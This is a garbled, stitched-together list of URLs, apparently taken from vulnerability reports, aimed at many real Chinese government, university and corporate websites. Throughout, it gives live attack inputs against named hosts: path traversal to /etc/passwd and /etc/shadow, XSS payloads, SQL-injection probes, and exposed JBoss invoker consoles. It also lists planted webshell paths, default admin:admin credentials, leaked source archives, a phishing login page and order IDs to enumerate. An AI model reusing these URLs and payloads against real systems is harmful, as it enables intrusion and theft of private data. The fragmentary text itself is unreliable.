http://www.cd315.gov.cn/admin/flash.asp http://www.cd315.gov.cn/admin/Pic.asp http://www.cd315.gov.cn/upme1.htm http://www.cd315.gov.cn/upme2.htm http://mailaddr.chinaums.com/admin/main.php http://mailaddr.chinaums.com/admin/entry_chooser.php?form_element=export_form.dn&rdn=%3Cimg%20src=1%20onerror=alert%281%29%3E http://mailaddr.chinaums.com/addr/addr.php http://mailaddr.chinaums.com/admin/main.php http://mailaddr.chinaums.com/info.php https://60.215.8.97/login.html http://www.cnzxsoft.com http://1.93.0.110:28099/ http://sms.shenzhenair.com/system/loginMng.do?p_code=1770270091817700090181770910918754 http://admin.i2ya.com/login.aspx http://admin.i2ya.com/ufs/201501/41044fe6be8c4a6cace5f876b9fc10d4.aspx http://101.251.64.195:8080/ http://www.kfzx.gov.cn/wenzhang_xx.asp?ID=33021 http://www.kfzx.gov.cn/wenzhang_xx.asp?ID=33021 http://sqlmap.org url:http://zfxx.cq.gov.cn/zfxxgk/web/views/Show!index.action http://www.sz.csg.cn/axis2/axis2-web/HappyAxis.jsp http://www.surong100.com/question/ask.html页面的标题处, https://mail.travelzen.com/ http://116.213.76.41:8080/ http://www.jlucapp.cn:80/portal/companion/product-apply-json!cpFileUpload2.action http://www.jlucapp.cn/portal/shell.jsp http://www.jlucapp.cn:80/portal/companion/product-apply-json!cpFileUpload2.action?&redirect:http://www.baidu.com http://m.deppon.com/mow/user/saveInfo.jspa http://www.citicsf.com/recruitment/resume.jsp?id=26 http://58.56.128.121:8081/higreceipt/security/loginInit.action;jsessionid=8mUUt2dRZhojxFKYP7fQZeiHmhOOX7D6Ql38EAdhbbpnXHIruO4m!-1480944981 admin:admin http://oa.sinopharmholding.com/seeyon/index.jsp http://119.145.114.146:88/ http://124.202.144.177/ http://app-vtion.com/ckadmin/member/doLogin.action https://cms.autonavi.com/seeyon/index.jsp https://open.suning.com/api/toLogin.action https://open.suning.com/api/toDevCenter.action slave104:fserver2 master:fserver1 www.jsgjj.com.cn/gjj/index.action http://**.**.**/gjj/css.jsp http://www.jjxnh.com/administrator/ http://www.966009.com 
http://www.966009.com/client/newsshow/ViewHelp.aspx?city=1&helpid=239 http://www.966009.com/client/newsshow/ViewHelp_guding.aspx?helptype=W001&helpid=231&labname=%B1%BE%D5%BE%C9%F9%C3%F7 www.webcn.net/jtyyt/admin.data.php?sql=select%20*%20from%20sms_v3.tbl_lydt%20where%20FollowCode=%2701%27 http://**.**.**/business&un=%E7%AE%A1%E5%A5%BD%E4%BD%A0%E5%AE%B6%E7%8C%AB6 http://m.deppon.com/mow/user/editPassword.jspa https://yun.fangdd.com/basic/login/login http://yun.fangdd.com/basic/user/my http://www.umetrip.com/downloads/JspSpy.jsp http://www.umetrip.com/downloads/index.jsp http://szga.dailyss.com/PingXuan/default.aspx http://www.cyqhy.gov.cn/yeNewsInfo.asp?id=55 http://www.cyqhy.gov.cn/yeNewsInfo.asp?id=55 http://sqlmap.org http://home.focus.cn/product/dianping_9/ http://home.focus.cn/chanpinku/ajax/comment_agree.php?comment_id=4442&agree=agree http://demo.173cms.com http://www.deppon.com/user/toWriteNameEmail.action http://1.192.147.136:8000/jzdj/admin/loginout.do http://115.239.168.50:82/ http://219.132.130.113:88/ http://58.250.163.30:88/ http://103.25.65.51:88/ http://123.232.112.146:82/ http://61.187.6.149:81/ http://124.114.153.30/ http://121.15.212.2:5098/ http://113.108.151.58:88/ http://113.98.248.148:81/ http://119.57.20.84:8080/ http://116.228.8.26:8081/ http://113.140.18.210:8081/ http://61.188.207.135:81/ http://124.127.101.18:8080/ http://www.vpclub.cn/ http://club.qingdaonews.com/ http://www.travel.citic.com/enterprise_news_details.jsp?docid=6048 http://123.233.240.70:9080/ksbm/checkjx.do?xzqh=370126 http://www.sdwscgs.com:9080/zdwz/xwl.do?smid=02&bgid=01&bj=10 http://223.99.198.194:9080/ksbm/checkjx.do?xzqh=371422 http://223.99.198.194:9080/ksbm/checkjx.do?type=bm&code=371415 http://www.wfcgs.com:9080/ksbm/checkjx.do?xzqh=370700 http://www.lycgs.gov.cn:9080/wscgs/xwl.do?smid=15&bgid=01&bj=8 http://123.130.246.26:9080/wscgs/xwl.do?smid=15&bgid=01&bj=8 http://60.211.179.22:9080/wscgs/xwl.do?smid=15&bgid=01&bj=8 
http://58.59.39.43:9080/wscgs/xwl.do?smid=15&bgid=01&bj=8 http://218.59.228.162/wscgs/xwl.do?smid=18&bgid=02&bj=8 http://cgs.ytjj.gov.cn:9061/wscgs/xwl.do?smid=15&bgid=01&bj=8 http://222.134.200.57:9080/wscgs/xwl.do?smid=15&bgid=01&bj=8 http://123.233.240.70:9080/ksbm/checkjx.do?xzqh=370126 http://123.131.131.94:9080/wscgs/xwl.do?smid=15&bgid=01&bj=8 http://www.966009.com/CLIENT/newsshow/ViewNews.aspx?city=1&msgid=2170 http://oa.xbzx.cn/seeyon/main.do http://oa.xbzx.cn/seeyon/main.do?method=main http://www.zte-e.com/manage/MainFrom.aspx http://e.abchina.com/hn/ http://www.qdzqqh.org/newslist.aspx?typeid=dtjgdt%27 http://www.qdzqqh.org/shownews.aspx?newsid=224%27 http://www.qdzqqh.org/MemberListqy.aspx?q=4%27 http://www.qdzqqh.org/admin/login.aspx http://www.qdzqqh.org/public/qhjjr/login.aspx?usertype=1 http://www.qdzqqh.org/public/yxry/login.aspx?usertype=2 http://124.129.183.88/Default.aspx http://www.u86.com.cn/register.php?p=1 http://www.u86.com.cn/register.phpp=%27%3E%3CSCrIpT%3Ealert%28585%29%3C%2FScRiPt%3E http://gm.cm.sdo.com/seal/ https://github.com/tianmaying/node-blog-demo/blob/b47adea52e8e3f74d7e1a3079b656b73458ab014/utils/mailer.js https://mail.pku.edu.cn https://vpn.pku.edu.cn http://home.focus.cn/product/goods_3026/ http://home.focus.cn/product/goods_3026 http://home.focus.cn/product/goods_3026 http://www.oa8000.com/solution.htm http://demo.oa8000.com http://babylife.beingmate.com/admin.php/Main www.daqinghr.gov.cn http://www.daqinghr.gov.cn/fileDownload.jsp?fileName=/../../../../../etc/passwd http://www.daqinghr.gov.cn/fileDownload.jsp?fileName=/../../../../../etc/shadow http://www.pkusz.edu.cn/mailbox/admin/login.php http://www.dyp2p.com)的新业务,帝友云(http://www.diyou.cn) inurl:/get_col_first_message.jsp?fid http://www.jnq.gov.cn/get_col_first_message.jsp?fid=3101&id=29552 http://www.nmfzb.gov.cn/get_col_first_message.jsp?id=39733&fid=5695 http://www.cyzq.gov.cn/get_col_first_message.jsp?id=17437&fid=1948 
http://www.fengzhen.gov.cn/get_col_first_message.jsp?id=50767&fid=6250 http://www.szwq.gov.cn/get_col_first_message.jsp?id=32073&fid=3392 http://www.chetdz.gov.cn/get_col_first_message.jsp?id=36885&fid=3781 http://www.jnq.gov.cn/get_col_first_message.jsp?fid=3101&id=29552 http://www.jnq.gov.cn/get_col_first_message.jsp?fid=3101&id=29552 http://haoma.uc.cn/unfreeze/checkAccount http://a.com/dz72/admincp.php?action=members&operation=newsletter&username=%2A&uid=0&srchemail=®datebefore=®dateafter=&postshigher=&postslower=®ip=&lastip=&lastvisitafter=&lastvisitbefore=&lastpostafter=&lastpostbefore=&birthyear=&birthmonth=&birthday=&lower[credits]=&lower[extcredits1]=&lower[extcredits2]=&higher[credits]=&higher[extcredits1]=&higher[extcredits2]= http://ldj.db.17173.com http://210.51.19.77/reports/ http://210.51.19.77/reports/ywjk.php?type=ivr http://210.51.19.77/reports/ywjklog.phptype=ivr&spc=10665106&serviceid=1259067391&oid=15 http://dev.bukkit.org/bukkit-plugins/dynmap http://www.baidu.com/s?wd=Minecraft%20Dynamic%20Map https://mobilegw.alipay.com/mgw.htm inurl:class_type.asp?a125id= http://www.ylove999.com/HXInfoChange/112/114.asp http://www.zssfxh.com//HXInfoChange/1/4.asp http://www.yuyaoschool.com/jgwmg/xmzfw/HXInfoChange/107/113.asp http://221.123.139.43:8080/ http://221.123.139.43:8080/eqframe.jsp http://mfw.uc.cn/download/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/home/jws/.bash_history url:http://xqwhgx.szlib.com/Index.action http://i.yixin.com/ http://houtai.vipshop.com/.svn/entries http://houtai.vipshop.com/111.html http://ico.58pic.com/ajax/download?format=ico&id=43511 http://ico.58pic.com/ajax/download?format=ico&id=43511可以下载一个图标文件,如果测试不正常就回报错,加单引号,查询语句和绝对路径都暴出来了,继续可以查到数据库安装路径系统类型等所有信息,这就比较好下手了 www.868e.com www.868e.com/manage http://www.hwtrip.com/ http://www.cdvcloud.com/ http://115.29.3.48 http://house.focus.cn/vote/noun.php?noun_name=sohu&proj_id=2037 
http://esdmobile.lenovo.com.cn/ http://esdmobile.lenovo.com.cn/SDIMoblieWeb/Views/Account/PasswordRetrieve.aspx http://www.metadata.com.cn/ http://58.155.179.40:8088/poweb/XunLanDownISO?flag=4xZswCF5&ISOID=37 http://202.206.242.26:88/poweb/XunLanDownISO?flag=4xZswCF5&ISOID=37 http://58.155.179.40:8088/poweb/XunLanDownISO?flag=4xZswCF5&ISOID=37 http://59.74.114.252:84/poweb/XunLanDownISO?flag=4xZswCF5&ISOID=37 http://210.38.64.114:85/poweb/XunLanDownISO?flag=4xZswCF5&ISOID=37 http://bwss.nlic.net.cn:8080/poweb/XunLanDownISO?flag=4xZswCF5&ISOID=37 http://202.107.224.28:8080//poweb/XunLanDownISO?flag=4xZswCF5&ISOID=37 http://202.38.232.118:8080/poweb/XunLanDownISO?flag=4xZswCF5&ISOID=37 http://rom.hztsg.com:9091/poweb/XunLanDownISO?flag=4xZswCF5&ISOID=37 http://211.67.126.11:8088/poweb/XunLanDownISO?flag=4xZswCF5&ISOID=37 http://210.32.33.245:8080/poweb/XunLanDownISO?flag=4xZswCF5&ISOID=37 http://202.115.54.45:8080/poweb/XunLanDownISO?flag=4xZswCF5&ISOID=37 http://202.115.54.45:8080/poweb/XunLanDownISO?flag=4xZswCF5&ISOID=37 http://bbs.liulanqi.baidu.com/属于特权域,如下图所示,可以成功在该域下执行特权API http://bbs.liulanqi.baidu.com/ http://pan.baidu.com的链接后,通过正则,匹配出链接后的JSON数据,parse后,未经过滤,即被拼接进入DOM中。 http://218.65.61.84/ www.inflight-media.cn/news.phpid=493 http://cha.17173.com/ http://cha.17173.com/dota2/trend.html www.orac.hainan.gov.cn:8081/travelstandard/login/loginInput.do https://**.**.**/ http://**.**.**/ 44.lvmaque.cn/tinvest/reward?id=2 http://www.lvmaque.cn/product/index.html http://www.lvmaque.cn/anli/index.html http://www.daiqile.com/fangan/看到,贷齐乐的P2C演示系统用的也是绿麻雀贷款系统: http://www.daiqile.com/fangan/ http://www.lifengnet.com/tinvest/reward?id=115 http://www.xzyinlian.cn/tinvest/reward?id=51 http://www.huiyip2c.com/tinvest/reward?id=45 http://dd.rongtianxia.com/tinvest/reward?id=48 http://t3.p2pzs.com/tinvest/reward?id=34 http://e.xdf.cn/Live-index-id-2325 http://122.11.49.93/ http://gl.yanxiu.com/ http://guanli.yanxiu.com/ http://122.11.49.93/ http://jsxx.gsedu.cn/ 
http://www.cqtzb.org.cn/bzxx/seexiangxi.aspx?id=39 http://www.jljgdj.org/MagazinePage.aspx?syear=2014&sqh=12 url:http://www.zjpost.com/gift/tbCardActive.action http://oa.zgcec.cn/paos/logon.action,打开中关村国家自主创新示范展示中心内部应用系统,如图所示: http://dbank.vmall.com/app/web/link/link_action.php?jsoncallback=jsonp1368989120166&action=list&uid=41986739&start=0&form=dbank_advance_link&size=20 http://visa.baicheng.com/order/detail/813114,813114这个六位数字遍历下即可。 http://visa.baicheng.com/order/detail/123222 http://visa.baicheng.com/order/detail/184924 http://visa.baicheng.com/order/detail/219991 http://visa.baicheng.com/order/detail/248811 http://cbadata.sports.sohu.com/images/players/500733.jpg/c.php http://www.ydh.cc/s/ url:http://hicwebchat.haier.net/chat-web/webchat.action http://116.228.70.229/toLogin.action http://223.2.10.24/cas/login.action http://www.njzb.net/HX_GetPassWord.asp http://sics.ynnu.edu.cn/articleview.aspx?id=278 http://zsb.ynnu.edu.cn/articleview.aspx?id=1 http://fao.ynnu.edu.cn/articleview.aspx?id=12 http://xnldjt.ynnu.edu.cn/articleview.aspx?id=531 http://gjxy.ynnu.edu.cn/articleview.aspx?id=87 http://huawen.ynnu.edu.cn/articleview.aspx?id=742 http://dawww.ynnu.edu.cn/articleview.aspx?id=72 http://xnldjt.ynnu.edu.cn/articleview.aspx?id=61 http://ein.ynnu.edu.cn/articleview.aspx?id=2 http://zzb.ynnu.edu.cn/articleview.aspx?id=44 http://jky.ynnu.edu.cn/articleview.aspx?id=94 http://lsxx.mca.gov.cn:9919/res/ http://lsxx.mca.gov.cn:9919/res/北京培训资料.rar http://lsxx.mca.gov.cn:9918/loginok.jsp?lg=2 http://211.86.195.15:8086/ggjs/zdjk/zdjkjg.jsp http://211.86.225.3:8090/ggjs/zdjk/zdjkjg.jsp http://218.241.174.148:8070/ggjs/zdjk/zdjkjg.jsp http://61.187.55.41:8090/ggjs/zdjk/zdjkjg.jsp http://www.kflib.cn:8089/ggjs/zdjk/zdjkjg.jsp http://lib.tongde.com:8089/ggjs/zdjk/zdjkjg.jsp http://58.133.216.9:8070/ggjs/zdjk/zdjkjg.jsp http://tsjs.sdwm.cn:8000/ggjs/zdjk/zdjkjg.jsp http://scsk.crsp.org.cn:8070/ggjs/zdjk/zdjkjg.jsp http://222.27.60.13/ggjs/zdjk/zdjkjg.jsp 
http://tsjs.ndjclib.com:8070/ggjs/zdjk/zdjkjg.jsp http://211.84.229.10:8089/ggjs/zdjk/zdjkjg.jsp http://tsjs.ndjclib.com:8070/ggjs/zdjk/zdjkjg.jsp http://211.84.229.10:8089/ggjs/zdjk/zdjkjg.jsp http://wooyun.org/bugs/wooyun-2015-089957的问题差不多 http://www.wooyun.org/bugs/wooyun-2010-077670 http://**.**.**/zjnj2011/Application/gongs.aspx http://**.**.**/Application/gongs.aspx http://**.**.**/sx2014/Application/gongs.aspx http://**.**.**/njbt2013/Application/gongs.aspx http://**.**.**/njbt2013/Application/gongs.aspx http://**.**.**/Njbt2013/Application/gongs.aspx http://**.**.**/xjnj2013/Application/gongs.aspx http://**.**.**/Application/gongs.aspx http://**.**.**/jl2013/Application/gongs.aspx http://**.**.**/2013/Application/gongs.aspx http://**.**.**/nybgj2013/Application/gongs.aspx http://**.**.**/sx2012/Application/gongs.aspx http://**.**.**/njbt2013/Application/gongs.aspx http://**.**.**/Application/gongs.aspx http://**.**.**/Application/gongs.aspx http://**.**.**/njgzbt2011/Application/gongs.aspx http://**.**.**/gznj2013/Application/gongs.aspx http://**.**.**/test2013/Application/gongs.aspx http://**.**.**/gsnjbt2012/Application/gongs.aspx http://**.**.**/2011/Application/gongs.aspx http://jjc.ynnu.edu.cn/shousuo.php http://zwxx.cjhy.gov.cn:8082/CHInfoPushPlat/login http://zwxx.cjhy.gov.cn:8082/CHInfoPushPlat/resources/uploadImageText/201501241118151240.jsp http://jsjy.ynnu.edu.cn/search.php http://www.qhxz.gov.cn/index/SpecialServ/ServList/ServShow/?id=46900200FG-SP-0002 http://www.bcgjj.com/tousu/visitshow.asp?id=7 http://news.cnpc.com.cn/search/search/ad/admin.php http://news.cnpc.com.cn/search/phpmyadmin/ http://z.jd.com/ http://lazycat8049.gicp.net/v98slg/meituan_login.html,而美团的登陆地址应该是https://passport.meituan.com/account/unitivelogin http://www.njztb.cn/complaint/visitshow.asp?id=5 http://115.28.222.71/Login.htm http://211.152.99.25:9080/ http://www.dameiweb.com/my/order-detail/order_id/0011 http://www.dameiweb.com/my/order-detail/order_id/0012 
http://www.dameiweb.com/my/order-detail/order_id/4144 http://221.228.210.187:8161/admin/connections.jsp http://t.wxgx.cn/web.zip http://www.qizhinet.com/ www.dglik.com/QzkeyAdmin/ zs-2-1410.qzkey.cn/qzkeyAdmin/ zs.jsbc.edu.cn/qzkeyadmin/ article.hmwhw.gov.cn/qzkeyadmin/ www.lishisp.com/qzkeyAdmin/ www.s-m-e.net/QzkeyAdmin/ www.biokau.com/qzkeyAdmin/ www.lvhuahb.com/QzkeyAdmin/ www.hnluoshi.com/qzkeyadmin/ www.gwjysh.com/qzkeyadmin/ www.easyrich.cn/QzkeyAdmin/ http://www.easyrich.cn/QzkeyAdmin/ http://www.zzyzjg.com/qzkeyAdmin/ http://www.hhggw.com/qzkeyadmin/ http://www.hdkunzhan.com/QzkeyAdmin/ http://www.jsthjsgc.com/qzkeyadmin/ http://www.info-speed.com.cn/qzkeyadmin/ http://www.chinablx.cn/QzkeyAdmin/ http://www.xzyfls-edu.com/qzkeyadmin/ http://www.taso-tip.com/QzkeyAdmin/ http://www.aegon-cnooc.com.cn:80/ www.aegon-cnooc.com.cn http://lxcic.999.com.cn:8089/echannel/LoginAction.action;jsessionid=516E492CFA59E5DD1225B4FD13C4D4A8 http://fe.hy-la.com:8088/ http://oa.chnjcdc.com:9090/ http://oa.chinabed.com/ http://oa.suncorps.cn/ http://www.koyochem.com:9191/ http://124.129.26.94:7742/ http://oa.shunhengli.com:9090/ http://218.90.146.246:9090/ http://119.97.198.27:8080/ http://60.12.98.27/ http://221.123.142.231/ http://m.deppon.com/mow/client/index.html#/login/personInformation http://mail.sf-express.com.tw http://fax.kdsw.cn/fax/system/getWrite.action http://ts.21cn.com/htdocs.tar.gz整站下载 http://ts.21cn.com:8088/ThinkPHP/Conf/.svn/entries http://www.kaiyuanhotels.com/home/index.htm http://www.kaiyuanhotels.com/test.txt http://trs.kaiyuanhotels.com/orderFlow/schedule.htm http://eb.kaiyuanhotels.com/fwActivity/showList.htm http://www.quqike.com/user_center.asp整个url判断,所以csrf绕过。 url:http://enorthapi.zjol.com.cn:8084/subscription/pages/Subscription/subpage.do http://enorthapi.zjol.com.cn:8084/subscription/one8.jsp www.51job.com http://market.douban.com http://www.kouclo.com/login http://**.**.**/ http://www.ht8d.com/ http://www.bjtel.cn/phpmyadmin/ http://**.**.** 
https://www.manytour.com/member/order/102230.html https://www.manytour.com/vdata/editDs160/5545.html https://www.manytour.com/vdata/editDs160/5512.html http://i.maxthon.cn/,主要原因在于上次访问的地方,没有对访问的title进行过滤,导致可以写入一些html,当然,能写入html自然也就可以写入js了。 http://i.maxthon.cn http://i.maxthon.cn http://256a.qd256.com/ http://envir.sjtu.edu.cn/ http://envir.sjtu.edu.cn/TeachandStudy/FosterList.php?num=4&cnum=49&ID=49 http://envir.sjtu.edu.cn/DetailDownLoadInfo.php?num=60&cnum=201&ID=1265 http://drops.wooyun.org/papers/1426 http://180.169.55.173/Service/FlightQuery.aspx?strCul=en https://www.shodan.io/host/149.174.97.92 http://huffsmith-shared-a-atc.evip.aol.com/ http://shkxc.njnu.edu.cn:7080/keyan/login.jsp http://moffice.wo.com.cn/FCKeditor/editor/filemanager/connectors/test.html# http://moffice.wo.com.cn/userfiles/ http://moffice.wo.com.cn/download.php http://61.55.147.29:88/ inurl:list_v.php?sid= http://j.scedu.com.cn/list_v.php?offset=80&sid=03 http://www.jit.com.cn/ http://139.209.60.6//zwdtSjgl/ysq/depListDir.jsp?department_id=013521374&department_name=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://218.62.90.168/zwdtSjgl/ysq/depListDir.jsp?department_id=013521374&department_name=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://61.138.128.150:8080/zwdtSjgl/ysq/depListDir.jsp?department_id=013521374&department_name=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://125.32.42.176/zwdtSjgl/ysq/depListDir.jsp?department_id=013521374&department_name=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD 
http://139.209.60.6//zwdtSjgl/ysq/depListDir.jsp?department_id=013521374&department_name=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://61.138.128.150:8080/zwdtSjgl/ysq/depListDir.jsp?department_id=013521374&department_name=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://www.jlfm.gov.cn:8081/zwdtSjgl/ysq/depListDir.jsp?department_id=013521374&department_name=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://www.jlfm.gov.cn:8081/zwdtSjgl/ysq/depListDir.jsp?department_id=013521374&department_name=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://139.209.60.6//zwdtSjgl/ysq/depListDir.jsp?department_id=013521374&department_name=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://www.guolv.com/jdzs/show.php?id=4253 http://www.guolv.com/jdzs/show.php?id=4253 http://www.nbpf.gov.cn:8001/Admin/Login.aspx www.haxx.lss.gov.cn http://member.21so.com/index.php?m=admin http://113.106.58.73:8090 http://113.106.58.73:8088/jmx-console/ http://113.106.58.73:8088/invoker/JMXInvokerServlet http://www.shzfcg.gov.cn:8090/net/center/stocklogin.jsp www.shzfcg.gov.cn:8090 http://www.shzfcg.gov.cn:8090 http://yjsy.uibe.edu.cn/graduate/ http://graduate.ouc.edu.cn/ http://124.17.100.84/graduate/ http://www.jit.com.cn/ http://www.jlfm.gov.cn:8081/zwdtSjgl/ysq/depInfo_iframe.jsp?depid=013520945&depname=吉林市国土资源局丰满分局 http://139.209.60.6/zwdtSjgl/ysq/depInfo_iframe.jsp?depid=72676418-1&depname=市联通公司 http://61.138.128.150:8080/zwdtSjgl/ysq/depInfo_iframe.jsp?depid=013513569&depname=吉林市卫生局 http://218.62.81.171/zwdtSjgl/ysq/depInfo_iframe.jsp?depid=732561102&depname=磐石市经济局 
http://222.160.175.90/zwdtSjgl/ysq/depInfo_iframe.jsp?depid=01358783-2&depname=柳河县发展和改革局 inurl:gaoquview.aspx?id= http://221.2.149.47:8100/gaoquview.aspx?id=220&newsid=1222&deptid=51 http://60.217.72.17:8000/gaoquview.aspx?id=220&newsid=1241&deptid=51 http://222.135.127.190:7000/gaoquview.aspx?id=220&newsid=1510&deptid=51 http://61.133.119.187:8089/gaoquview.aspx?id=220&newsid=1720&deptid=51 http://222.135.109.70:8100/gaoquview.aspx?id=220&newsid=1601&deptid=51 http://221.2.171.59:8000/gaoquview.aspx?id=220&newsid=1280&deptid=51 http://58.252.173.225:8088/invoker/JMXInvokerServlet http://58.252.173.225:8088/ http://58.252.173.225/webAuth/ jdbc:oracle:thin:@10.66.1.11:1521:orcl jdbc:oracle:thin:@localhost:1521:BSTEK http://crl.mcd.com/ http://cps.mcd.com/ http://diantai.ifeng.com/webcall/tv.php?aid=5&c=5&p=1&s=qzone http://124.207.102.86:8080/identify/catalog/show/1 http://gzgy.lss.gov.cn:8001/ http://gzgy.lss.gov.cn:8001/invoker/JMXInvokerServlet http://perc-sinano.com/en/rcdwShow.asp?id=28 http://www.hkcdc.cn/read.php?news_id=504 http://www.byd-auto.net/company/news.php?action=readnews&page=1&nid=155 http://www.jit.com.cn/ http://218.27.140.5/zwdtSjgl/Directory/depListXX.jsp?department_id=B02C579&department_name=%CA%E6%C0%BC%CA%D0%C3%F1%D5%FE%BE%D6&department_Type=1 http://218.27.190.107:8080/zwdtSjgl/Directory/depListXX.jsp?department_id=DE200804031151000109&department_name=%CA%D0%C3%F1%D5%FE%BE%D6&department_Type=1 http://www.jlfm.gov.cn:8081/zwdtSjgl/Directory/depListXX.jsp?department_id=AAB156&department_name=%B7%E1%C2%FA%C7%F8%BD%CC%D3%FD%BE%D6&department_Type=1 http://139.209.60.6/zwdtSjgl/Directory/depListXX.jsp?department_id=DE200804031235200968&department_name=%CA%D0%D0%C5%B7%C3%B0%EC&department_Type=1 http://61.138.128.150:8080/zwdtSjgl/Directory/depListXX.jsp?department_id=AA335&department_name=%BC%AA%C1%D6%BA%A3%B9%D8&department_Type=1 
http://125.32.42.176/zwdtSjgl/Directory/depListXX.jsp?department_id=AA2B359&department_name=%F2%D4%BA%D3%CA%D0%D6%CA%C1%BF%BC%BC%CA%F5%BC%E0%B6%BD%BE%D6&department_Type=1 http://222.160.65.182:8000/zwdtSjgl/Directory/depListXX.jsp?department_id=4028818231752c5c013178d7f2f80049&department_name=%B7%F6%D3%E0%CA%D0%C8%CB%C1%A6%D7%CA%D4%B4%BA%CD%C9%E7%BB%E1%B1%A3%D5%CF%BE%D6&department_Type=1 http://222.160.65.182:8000/zwdtSjgl/Directory/depListXX.jsp?department_id=4028818231752c5c013178d47a5c0007&department_name=%B7%F6%D3%E0%CA%D0%B2%D0%C1%AA&department_Type=1 http://218.62.86.138/zwdtSjgl/Directory/depListXX.jsp?department_id=AAB248&department_name=%E8%EB%B5%E9%CA%D0%B3%A3%C9%BD%D5%F2%D5%FE%B8%AE&department_Type=1 http://58.244.248.90:81/zwdtSjgl/Directory/depListXX.jsp?department_id=4028816f33f8696e0133fd6a968b0105&department_name=%CB%AB%C1%C9%CA%D0%B9%A9%B5%E7%BE%D6&department_Type=1 http://218.27.140.5/zwdtSjgl/Directory/depListXX.jsp?department_id=B02C579&department_name=%CA%E6%C0%BC%CA%D0%C3%F1%D5%FE%BE%D6&department_Type=1 http://58.244.248.90:81/zwdtSjgl/Directory/depListXX.jsp?department_id=4028816f33f8696e0133fd6a968b0105&department_name=%CB%AB%C1%C9%CA%D0%B9%A9%B5%E7%BE%D6&department_Type=1 http://www.bydeurope.com/news/news.php?action=readnews&page=1&nid=195 http://218.21.32.100:8001/ecis/login.action http://218.21.32.100:8003/jmx-console/ http://bidding.sdic.com.cn:8080/projectname/reglogins/entity/iczsupplyreginfo/index.do http://bidding.sdic.com.cn:8080//guige.jsp http://61.150.72.184:9090/login.jsp http://61.150.72.184:8080/ http://61.150.72.184:9090/invoker/JMXInvokerServlet http://xxs.zxtaxt.com/login.asp http://www.inspur.com/ http://www.website.com/DocCenterService/image?photo_size=&photo_id=1 http://shop.inspur.com/ecweb/bj/ http://shop.inspur.com/ecweb/erp/ http://shop.inspur.com/ecweb/stb/ http://shop.inspur.com/ecweb/led/ http://shop.inspur.com/ecweb/cloud/ 
http://shop.inspur.com/DocCenterService/image?photo_size=../../../../../../../../../../etc/passwd%00&photo_id=1 http://shop.inspur.com/DocCenterService/image?photo_size=../../../../../../../../../../etc/shadow%00&photo_id=1 http://www.postbuy.com.cn/DocCenterService/image?photo_size=../../../../../../../../../../etc/passwd%00&photo_id=7719 http://www.onesgo.cn/DocCenterService/image?photo_size=../../../../../../../../../../etc/passwd%00&photo_id=45137 http://www.hhncpw.com/DocCenterService/image?photo_id=9943&photo_size=../../../../../../../../../../etc/passwd%00 http://www.iec365.com:8080/DocCenterService/image?photo_id=10443&photo_size=../../../../../../../../../../etc/passwd%00 http://www.ebuymi.com/DocCenterService/image?photo_id=10443&photo_size=../../../../../../../../../../etc/passwd%00 http://www.zbgtj.gov.cn:9080/jmx-console/ http://www.wyol.com.cn/install/install.php http://218.28.177.28/logonAction.do http://www.zjmb.gov.cn/invoker/JMXInvokerServlet http://cms.chinabidding.com/cms/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector http://drops.wooyun.org/papers/1426 http://www.oaxis.com/cn/product_list.php?id=2 http://b.agent.fang.com/magent/Support/feedback/FeedDetails.aspx?feedid=3620 http://b.agent.fang.com/magent/Support/feedback/myopinions.aspx?txtBeginDate=&txtEndDate=&selStatus=&page=1&action=del&feedid=3620 http://b.agent.fang.com/magent/Support/feedback/FeedDetails.aspx?feedid=3626这条别人的意见来测试! 
